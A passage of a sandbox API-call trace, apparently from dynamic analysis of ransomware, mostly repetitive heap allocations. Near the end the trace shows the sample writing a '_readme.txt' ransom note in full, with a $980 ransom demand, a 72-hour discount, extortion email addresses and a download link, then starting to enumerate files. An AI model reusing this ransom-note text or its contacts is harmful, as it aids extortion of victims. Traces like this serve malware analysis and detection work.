RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.618] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.618] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.618] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.618] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.618] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.618] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.618] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.618] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.618] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.619] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.619] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.619] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.619] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.619] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.619] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.619] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.619] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.619] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.619] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.619] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.619] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.619] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.619] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.619] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.619] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.619] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.619] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.619] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.619] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.619] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.619] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.619] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.619] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.619] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.619] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.619] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.619] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.619] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.619] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.619] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.619] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.619] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.619] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.619] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.619] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.619] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.620] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.620] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.620] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.620] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.620] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.620] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.620] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.620] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.620] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.620] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.620] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.620] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.620] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.620] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.620] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.620] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.620] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.620] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.620] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.620] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.620] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.620] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.620] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.620] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.620] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.620] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.620] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.620] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.620] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.620] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.620] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.620] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.620] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.620] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.620] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.620] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.620] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.620] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.621] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.621] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.621] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.621] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.621] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.621] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.621] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.621] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.621] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.621] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.621] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.621] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.621] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.621] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.621] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.621] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.621] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.621] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.621] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.621] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.621] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.621] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.621] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.621] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.621] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.621] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.621] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.621] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.621] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.621] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.621] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.621] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.621] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.621] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.621] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.622] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.622] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.622] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.622] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.622] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.622] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.622] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.622] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.622] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.622] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.622] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.622] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.622] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.622] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.622] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.622] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.622] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.622] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.622] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.622] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.622] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.622] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.622] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.622] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.622] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.622] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.622] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.622] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.622] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.622] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.622] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.622] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.622] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.622] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.622] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.622] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.622] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.623] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.623] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.623] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.623] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.623] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.623] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0165.623] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.623] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.623] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.623] PathFindFileNameW (pszPath="") returned="" [0165.623] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.623] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.624] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.624] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0165.624] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.624] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19640 [0165.624] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.624] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.624] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0165.624] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.624] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.624] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 0 [0165.625] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b44e70 [0165.625] lstrcpyW (in: lpString1=0x3b44e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.625] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.625] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.625] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\_readme.txt" (normalized: "c:\\boot\\fr-fr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.625] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.625] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e70 | out: hHeap=0xcd0000) returned 1 [0165.625] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.625] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.626] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.626] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.626] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, 